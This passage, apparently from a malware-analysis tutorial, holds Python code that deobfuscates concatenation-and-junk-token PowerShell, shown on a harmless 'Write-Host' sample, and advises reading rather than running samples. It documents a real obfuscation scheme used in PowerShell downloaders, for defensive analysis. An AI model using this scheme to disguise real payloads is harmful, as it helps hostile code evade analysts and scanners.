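# string-concatenation scheme the post describes, followed by one .RePlAcE
# clause that maps the junk token "7Bk" back to a single quote (char 39).
SAMPLE = (
    "((' WrA64+A64ite-HoVpa+VpastA64+A64 7BkHelA64'+'+A64lo fVp'+'a+Vparom "
    "7Bkanalyst7Bk').RePlAcE(([chaR]55+[chaR]66+[chaR]107),[sTrING][chaR]39))"
)

CHAR_CODE = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)
REPLACE_CLAUSE = re.compile(r"\.replace\(\s*\(([^()]*)\)\s*,\s*([^()]*)\)", re.IGNORECASE)


def resolve_char_codes(expr):
    """'[chaR]55+[chaR]66+[chaR]107' -> '7Bk'. The [sTrING] cast and the '+'
    operators add nothing, so only the numeric char codes are read."""
    return "".join(chr(int(n)) for n in CHAR_CODE.findall(expr))


def replace_chain(script):
    """(junk_token, real_text) pairs for every .RePlAcE((codes),codes) clause,
    in the order the script applies them."""
    return [(resolve_char_codes(old), resolve_char_codes(new))
            for old, new in REPLACE_CLAUSE.findall(script)]


def frequent_tokens(text, length=3, min_count=3):
    """Count every run of `length` alphanumeric characters. Junk tokens such
    as A64 or Vpa recur far more often than any real word, so they float to
    the top of this list; the analyst still decides which ones to delete."""
    counts = Counter(text[i:i + length] for i in range(len(text) - length + 1))
    return [(tok, n) for tok, n in counts.most_common()
            if tok.isalnum() and n >= min_count]


def strip_junk(text, tokens):
    """The post's method: delete the concatenation glue and the junk tokens,
    and repeat until nothing changes, because deleting '+' can splice a junk
    token that was split across two literals back together (Vp'+'a -> Vpa)."""
    previous = None
    while previous != text:
        previous = text
        for tok in ["'+'", "+", *tokens]:
            text = text.replace(tok, "")
    return text


def deobfuscate(script):
    """Return (readable_text, token_meanings). Only the part before the first
    .RePlAcE clause is cleaned, as the post does; the clauses themselves are
    decoded so the analyst knows what each junk token stood for."""
    body = re.split(r"\.replace\(", script, maxsplit=1, flags=re.IGNORECASE)[0]
    junk = [tok for tok, _ in frequent_tokens(body)]
    return strip_junk(body, junk).strip(), replace_chain(script)


if __name__ == "__main__":
    readable, meanings = deobfuscate(SAMPLE)
    print(readable)  # ((' Write-Host Hello from analyst')
    for junk_token, real in meanings:
        print(f"{junk_token!r} stood for {real!r}")
```

    As in the Notepad method, the cleaned text is for reading, not for running: deleting a token such as 7Bk also deletes the quote it stood for. The decoded replace chain tells you that ([chaR]55+[chaR]66+[chaR]107 is "7Bk", [chaR]39 is a single quote), which is usually enough to read the downloader logic without ever executing the sample.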
     